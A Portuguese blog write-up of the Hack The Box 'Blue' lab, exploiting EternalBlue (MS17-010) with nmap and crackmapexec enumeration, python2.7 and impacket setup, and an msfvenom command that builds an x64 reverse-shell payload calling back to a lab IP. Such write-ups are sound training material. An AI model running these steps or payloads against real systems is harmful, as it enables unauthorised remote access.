Blue - HTB Write Up - Eternal Blue Exploit - CVE-2017-0144


 Eternal Blue Exploit - CVE-2017-0144

Enumeração Geral 

nmap -Pn -sV -O -sC [ip]



nmap -Pn -sV -sC -sU [ip]


SMB Scan

nmap -Pn --script vuln -p 445 [ip]


A resposta do scan mostra que o servidor é vulnerável ao Eternal Blue - MS17-010 e com o crackmapexec é possível validar a versão do sistema operacional do servidor:

crackmapexec smb [ip] -u "" -p "" --shares 


A vulnerabilidade MS17-010 já tem artigo aqui no blog, conforme esse artigo o repositótio worawit possui o shellcode necessário para executar o ataque. 

Alguns pontos sobre os requisitos para explorar o Eternal Blue precisam ser descritos: 

[+] O exploit usa a versão python2.7
[+] é necessário criar um ambiente virtual do python na versão 2.7
[+] O pip2.7 precisa ser instalado e para fazer isso é necessário seguir as etapas abaixo:

Download do script para obter o pip2.7

Instalação do pip2.7
python2.7 get-pip.py

[+] O exploit usa o módulo impacket 
[+] É necessário instalar o impacket no ambiente virtual do python2.7

!! Error na instalação do impacket para o python2.7

Instale o setuptools com o pip2.7

pip2.7 install --upgrade setuptools


Instale o impacket com o pip2.7



Feito essas etapas, o exploit pode ser executado. O MS17-010 requer uma série de comandos antes da execução e esses comandos estão descritos no artigo anterior AQUI 

Attack !!

A diferença entre o exploit mostrado anteriormente e esse ataque é a arquitetura. O servidor Blue tem arquitetura x64 e o shellcode e o payload gerado com o MSVenom foi para x64, conforme o comando abaixo: 

msfvenom -p windows/x64/shell_reverse_tcp -f raw -a x64 -o scx64_msf.bin EXITFUNC=thread LHOST=10.10.14.48 LPORT=2525

Execução do exploit



Shell Reversa 

Done!! 




O acesso ao servidor Blue é concedido com privilégio elevado, finalizando assim o laboratório sem a necessidade da etapa de escalação de privilégio. 



Comentários

Postagens mais visitadas